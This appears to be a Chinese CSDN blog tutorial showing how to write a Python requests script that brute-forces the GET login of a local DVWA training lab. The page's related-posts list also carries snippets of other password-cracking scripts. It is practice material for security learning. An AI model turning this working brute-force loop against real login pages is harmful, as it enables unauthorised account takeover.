Python编写简单GET暴力破解

最新推荐文章于 2024-04-10 11:33:48 发布
最新推荐文章于 2024-04-10 11:33:48 发布
阅读量887 收藏 2
点赞数 5
分类专栏: 笔记 python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50620293/article/details/115166154
版权
笔记 同时被 3 个专栏收录
7 篇文章 0 订阅
订阅专栏
安全
6 篇文章 0 订阅
订阅专栏
python
5 篇文章 0 订阅
订阅专栏

最近简单学习了一下python的request模块,虽说简单,但是是思想的基础,值得实践一下,一步步发现错误一步步改正,记录一下过程
靶场为dvwa简单难度的暴力破解模块
python中的request包可以对网页发送请求以及接收回应,再结合循环,以此作为暴力破解的基础。整个代码流程为构造url,伪造headers,构造爆破字典,循环爆破

第一步,获取url

首先dvwa的暴力破解模块是get请求,所以直接先随便提交一组数据,复制它的url即可。(post暴力破解之后再做研究)

http://127.0.0.1/DVWA-master/vulnerabilities/brute/?username=admin&password=123&Login=Login#

问号后面是提交的数据,所以python中构造的基础url为

url = "http://127.0.0.1/DVWA-master/vulnerabilities/brute/"

第二步,构造字典

从第一步的url可以看出,我们要提交数据的变量名为username password Login,一共三个。爆破字典在python中一定为一个字典数组。每个字典中有三对键值。这里简单写几个就好了

payload = [{"username":"admin","password":"123","Login":"Login"},
            {"username":"admin","password":"admin","Login":"Login"},
            {"username":"admin","password":"password","Login":"Login"},
            {"username":"admin","password":"12345","Login":"Login"},
           ]

第三步,发现问题,构造headers

首先我们得知道如果爆破成功与否,响应回来的东西有什么不同。
然后我们分别看一下,登录成功和登录失败的区别,这里就不额外构造错误的字典了,我的admin密码是12345,直接用payload里的第一个元素和最后一个元素。

先看登录失败,使用payload的中的第一个元素,用requests中的get方法

response = requests.get(url=url,params=payload[0])
result = response.content
print(result)

输出结果如下
在这里插入图片描述
发现很多\t\n,意识到是因为没有转化编码格式。重写一下

response = requests.get(url=url,params=payload[0])
result = response.content.decode('utf-8')
print(result)

然后看结果
在这里插入图片描述
然后同样方式,看一下登录成功

response = requests.get(url=url,params=payload[3])
result = response.content.decode('utf-8')
print(result)

结果
在这里插入图片描述

此时发现不对劲,两次结果一样。
仔细观察后,发觉这是dvwa的登录页面(login.php),并不是简单难度的暴力破解模块。然后想到自己没有构造请求头,因为没有cookie的原因需要重新登录dvwa。现在构造一下请求头。
用浏览器登录dvwa,设置难度之后,打开暴力破解模块,然后刷新页面,f12看一下响应头信息,我们需要cookie和user-agent
在这里插入图片描述
然后返回编译器,构造请求头。大小写要完完全全和浏览器回应的一样。

headers = {
    "User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36",
    "Cookie" : "security=low; PHPSESSID=sae57h8lmti1rp9bmi3l26sge7"
}

之后再测试成功和失败。在调用requests.get时多加一个headers的参数
先看成功:

response = requests.get(url=url,params=payload[3],headers=headers)
result = response.content.decode('utf-8')
print(result)

在这里插入图片描述
失败:

response = requests.get(url=url,params=payload[0],headers=headers)
result = response.content.decode('utf-8')
print(result)

在这里插入图片描述
不难看出,成功后有Welcome to the password protected area admin的字样

第四步,爆破

现在已经知道了爆破成功与否返回结果的不同。可以开始写爆破部分了。
首先要爆破,肯定是一个循环,循环次数便是数组字典的元素个数。
循环会逐个产生响应结果,从结果中我们只要利用万能的正则表达式提取出关键字“Welcome to the password protected area admin”就说明我们爆破成功。想要提取字符,就要把响应结果转为字符串,使用正则表达式还要引入re包。按照这个思路,就可以写出下面的代码:

partten = re.compile('Welcome to the password protected area admin')
for i in payload:
    response = requests.get(url=url, params=i, headers=headers)
    result = response.content.decode('utf-8')
    result = str(result)
    if len(re.findall(partten, result)) != 0 :
        print('爆破成功')
        print(i)

解释一下if判断。re.findall的返回结果是一个list,查到几个符合正则表达式的结果,这个list就有几个元素,对应如果没有查到,这个list的长度就为0,所以当list结果不为空时,即爆破成功。
在这里插入图片描述

Hileaf
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python 暴力破解wifi密码
03-19
通过字典,用python暴力破解wifi密码,大概一秒尝试一个字典信息。
python编写暴力破解FTP密码小工具
01-20
python具体强大的库文件,很多功能都有相应的库文件,所以很有必要进行学习一下,其中有一个ftp相应的库文件ftplib,我们只需要其中的登录功能,然后利用多线程调用相应字典里面的字段进行登录,还能根据自己的需要...
利用Python自动生成暴力破解的字典
weixin_33709364的博客
08-06 1311
Python是一款非常强大的语言。用于测试时它非常有效,因此Python越来越受到欢迎。 因此,在此次教程中我将聊一聊如何在Python中生成字典,并将它用于任何你想要的用途。 前提要求 1,Python 2.7(对于Python 3.x的版本基本相同,你只需要做一些微小调整) 2,Peace of mine(作者开的一个玩笑,这是一首歌名) 如果你用virtualenv搭建Python...
Tomcat弱口令爆破和后端getshell漏洞复现,2024年最新给后辈的一点建议
最新发布
2401_84183451的博客
04-10 669
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
python暴力破解代码
热门推荐
10-16 11万+
MySQL 数据库暴力破解代码 ··· -- coding: utf-8 -- import pymysql success = False f_user = open(‘username.txt’, ‘r’) f_pwd = open(‘password.txt’, ‘r’) lines_user = f_user.readlines() #读取出来是一个列表 lines_pwd = f_pw...
python爆破
Hydra的博客
10-18 1665
ichunqiu平台上有一道web题象棋 查看源码发现其中一个正则js,[abcmlyx]{2}ctf[0-9]{3}.js 爆破一波 #!/usr/bin/python # coding=utf-8 import requests url1 = "http://a44460084873484cab7374e36274d8aa4111712deb514b8a.game.ichunqiu...
python暴力破解
qq_51768842的博客
03-16 5421
简单介绍利用python的itertools库,实现暴力破解
python编写暴力破解zip文档程序的实例讲解
12-25
编写暴力破解Zip文件要从学习zipfile库的使用方法入手,首先打开Python解释器,用help(‘zipfile’)命令来了解这个库并重点看一下ZipFile类中的extractall()这个方法 ZipFile extractall() 让我们来写一个脚本...
Python写的PHPMyAdmin暴力破解工具代码
12-25
PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。 #!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url...
python暴力破解蓝奏网盘密码.zip
06-28
python暴力破解蓝奏网盘密码 输入地址,提交延迟时间,和字典文件,即可开始
python之——使用python编写爆破脚本
wsnbbz的博客
04-15 3033
此处以dvwa网站的密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url="http://localhos...
3-python实现暴力破解
m0_62978778的博客
12-28 790
3、获得HTTP响应,分析响应结果,看看有没有错误提示“Username and/or password incorrect.”2、HTTP连接到需要暴破的地址。与爬虫请求request方法类似。4、如果有提示,就继续下一次循环。5、如果没有,就代表暴破成功。1、从字典读取值,生成密码。
xmlhttp GET方式暴力破解
|独自望海。。。
09-20 1117
body         { font-size: 10pt; background-color:#D4D0C8 }td           { font-size: 9pt }/*程序标题:javascript字典探测用户名工具发布时间:2006年8月文章作者:翟振凯 (小琦)作者网站:http://www.xiaoqi.net    作者论坛:http://www.tdqy.com演示
Python暴力破解密码
芊樱烛渊的博客
04-22 6084
一、导入包 此处我们需要用到itertools和zipfile两个包 import itertools import zipfile 我们先来简单认识一下itertools包的简单用法 digital_list=list(itertools.permutations(['0','1','2','3','4','5','6','7','8','9'],3)) d_list=[''.join(x) for x in digital_list] print(digital_list) print(d_
Python 暴力破解密码字典生成代码,轻便,少占资源
wanghb221的博客
11-13 1045
本文对之前的密码生成的itertools.produc 和字典文件方法做了改进,可以用较小的负担完成。
python字典破解
梦想的风筝的博客
01-27 621
import urllib.request #python3中已经没有了urllib2这个库 import threading import queue import urllibthreads =50 target_url ="http://testphp.vulnweb.com" wordlist_file="/tmp/all.txt" #从SVNDigger读取txt文件 user_
Python实现暴力破解有密码的zip文件
weixin_39098318的博客
03-20 1858
背景 今天朋友给我发了一个某游戏的兑换码,压缩文件发过来的。结果被加密了。wc?还说叫爸爸就给我密码?男人是这么容易像恶势力低头的?直接给你爆了好吧,小兔崽子。 一、思路 爆密码的思路其实都大同小异:无非就是字典爆破,就看你是有现成密码字典,还是自己生成密码字典,然后进行循环输入密码,直到输入正确位置。现在很多都有防爆破限制,根本无法进行暴力破解,但是似乎zip这种大家都是用比较简单的密码而且没有...
python实现暴力破解
qq_43550748的博客
10-16 2598
import urllib2 import urllib import cookielib import threading import sys import Queue from HTMLParser import HTMLParser user_thread =10 #这里登录名默认admin username ="admin" #pass.txt中保存密码文本文件...
python 穷举法生成爆破密码词典
MuratHalik的博客
11-05 1987
本次折腾用于忘记比特币核心钱包支付密码的暴力破解(如果成功我就躺平!python 穷举法生成爆破密码词典。
Python密码暴力破解
05-13
密码暴力破解是一种攻击方式,通常用于尝试破解加密密码或访问受保护的系统。在Python中,可以使用循环或递归来创建密码暴力破解程序。 以下是一个简单的密码暴力破解程序示例,使用Python中的循环: ```python import itertools def brute_force(password): chars = 'abcdefghijklmnopqrstuvwxyz0123456789' attempts = 0 for length in range(1, len(password) + 1): for guess in itertools.product(chars, repeat=length): attempts += 1 guess = ''.join(guess) if guess == password: return (guess, attempts) return (None, attempts) password = input("Enter password to brute force: ") result, attempts = brute_force(password) if result: print(f"Password: {result} found in {attempts} attempts") else: print(f"Password not found in {attempts} attempts") ``` 该程序使用 `itertools.product` 生成所有可能的密码组合,然后循环尝试每个密码,直到找到匹配的密码或尝试完所有组合。在实际应用中,密码暴力破解是一种非常低效的攻击方式,因为需要尝试大量的组合,并且会被大多数系统检测到并拒绝访问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值